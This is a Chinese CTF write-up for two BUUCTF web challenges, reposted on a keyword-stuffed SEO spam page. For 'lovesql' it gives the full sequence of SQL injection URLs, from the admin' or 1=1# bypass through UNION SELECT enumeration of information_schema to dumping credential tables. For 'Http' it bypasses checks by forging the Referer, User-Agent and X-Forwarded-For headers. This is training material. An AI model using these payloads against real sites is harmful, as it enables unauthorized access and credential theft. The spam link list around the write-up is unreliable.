当前位置: 首页 > wzjs >正文

大庆信息网seo优化操作

大庆信息网,seo优化操作,资深seo顾问,俄罗斯外贸公司名录9.lovesql(SQL注入考点) 解题过程:①是否存在SQL注入 ②万能密码 admin or 11 ③爆字段数 ④看回显 ⑤爆数据库 ⑥爆数据库的表 ⑦爆出表的列 ⑧读取内容,爆flag 基础知识点:union 联合查询,information表,group_con…

9.lovesql(SQL注入考点)

解题过程:①是否存在SQL注入 ②万能密码 admin' or 1=1 ③爆字段数 ④看回显 ⑤爆数据库 ⑥爆数据库的表 ⑦爆出表的列 ⑧读取内容,爆flag

基础知识点:union 联合查询,information表,group_concat()字符串连接

①是否存在SQL注入:加单引号报错 (语法错误)

/check.php?username=1'&password=2

/check.php?username=1&password=2'

/check.php?username=1'&password=2'

②使用万能密码 admin' or 1=1# 或者1' or 1=1# 密码随便写

(在输入框输入的#,可以直接使用hackbar地址栏,只需要将#进行URL编码,即替换为%23)

③爆字段(判断字段数,或者用union select null(,null,null)来判断)

check.php?username=admin ' order by 1 %23&password=1

check.php?username=admin ' order by 2 %23&password=1

check.php?username=admin ' order by 3 %23&password=1

check.php?username=admin ' order by 4 %23&password=1

发现4个参数报错,说明有3个字段

④看回显

/check.php?username=1' union select 1,2,3%23&password=1

页面显示hello 2! Your password is '3'说明回显点位在2,3

⑤爆数据库

/check.php?username=1' union select 1,database(),version()%23&password=1

⑥爆数据库的表

/check.php?username=1' union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database()%23&password=1

爆出来数据库的表名有geekuser, l0ve1ysq1

⑦爆出表的列(查看两个表)

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='geekuser'%23&password=1

/check.php?username=1' union select 1,2,group_concat(column_name) from information_schema.columns where table_name='l0ve1ysq1'%23&password=1

页面显示id,username,password

⑧读取内容,爆flag

/check.php?username=1' union select 1,2,group_concat(id,username,password) from geekuser%23&password=1

/check.php?username=1' union select 1,2,group_concat(id,username,password) from l0ve1ysq1%23&password=1

或者

/check.php?username=1' union select 1,2,group_concat(username,0x40,password) from l0ve1ysq1 %23&password=1

/check.php?username=1' union select 1,2,group_concat(username,0x40,0x40,password) from l0ve1ysq1 %23&password=1

10.Http(http代理)

基础知识:

  • X-Forwarded-For(XFF)又名XFF头

1)概述:X-Forwarded-For(XFF)是用来识别通过HTTP代理或负载均衡方式连接到Web服务器的客户端最原始的IP地址的HTTP请求头字段。 Squid 缓存代理服务器的开发人员最早引入了这一HTTP头字段,并由IETF在HTTP头字段标准化草案中正式提出。 2)作用:获得HTTP请求端的真是IP 3)格式: X-Forwarded-For: client1, proxy1, proxy2, proxy3 其中client1是原始客户端的IP,后面接着是代理服务器的IP

  • Referer请求头字段

1)概述:Referer是header的一部分,当浏览器向web服务器发送请求的时候,一般会带上Referer,告诉服务器该网页是从哪个页面链接过来的,服务器因此可以获得一些信息用于处理。

2)作用:告诉服务器该请求是通过哪个页面发送过来的,从而使服务器进行对应的处理。

3)格式:Referer:url(此处为页面链接)

  • User-Agent请求头字段

1)概述:User-Agent是HTTP请求中用来检查浏览页面的访问者在用什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好的字段。

2)作用:告知服务器访问页面的客户是什么操作系统(包括版本号)浏览器(包括版本号)和用户个人偏好

3)格式:User-Agent:Mozilla/5.0 (平台) 引擎版本 浏览器版本号 (此为通常格式)

解题过程:

查看网页源代码,发现Secret.php,点开后发现是"it doesn't come from 'https://Sycsecret.buuoj.cn'",提示该网页的Referer头为"https://Sycsecret.buuoj.cn",在请求头中添加Referer:https://Sycsecret.buuoj.cn字段发送请求后得到响应为

使用"Syclover" browser,于是将User-Agent改为"Syclover" brower即可

根据提示,是来自本地的访问请求,所以更改XFF头为127.0.0.1

爆出flag

http://www.dtcms.com/wzjs/233535.html

相关文章:

  • 网站怎样做没有病毒网页制作网站制作
  • 美妆网站开发背景广东又出现新病毒
  • 新疆生产建设兵团血站网站潍坊关键词优化平台
  • 东莞市网站建设平台全媒体运营师报考条件
  • bootstrap构建自己的网站软文营销怎么做
  • 如何更换网站服务商抖音营销推广方案
  • 怎样做网站上的语种链接杭州seo推广优化公司
  • 长沙 网站设计 公司价格百度发作品入口在哪里
  • 网站开发作业总结seo网站自动发布外链工具
  • 怎么做火短视频网站谷歌海外推广怎么做
  • 试用网站源码搜索推广公司
  • 智慧旅游网站建设方案ppt网销是什么工作好做吗
  • 企业网站开发制作seo就是搜索引擎广告
  • 一个网站如何做推广网站建设黄页视频
  • 建设网站破解版放心网站推广优化咨询
  • 做公司中文网站需要注意什么培训课程表
  • 泉州网站开发数据分析师培训
  • 拍大师官方网站 图片做视频goole官网
  • 广西柳州做网站百度竞价规则
  • 新密网站泉州网站建设
  • 网站找人做的他能登管理员吗百度开户怎么开
  • 长春网页网站制作seo优化网站词
  • 招标网站建设招标方案模板高清视频线和音频线的接口类型
  • phpcms双语网站怎么做做任务赚佣金的正规平台
  • 网站建设与用户需求分析(初稿线上营销推广方式都有哪些
  • 网站制作公透明清晰重庆疫情最新情况
  • 建站成功是怎么回事seo网络推广是干嘛的
  • 神华公司两学一做网站软文广告经典案例800字
  • 小程序商城多少钱开鲁网站seo转接
  • 个人网站建设流程 域名注册的选择网络营销专业课程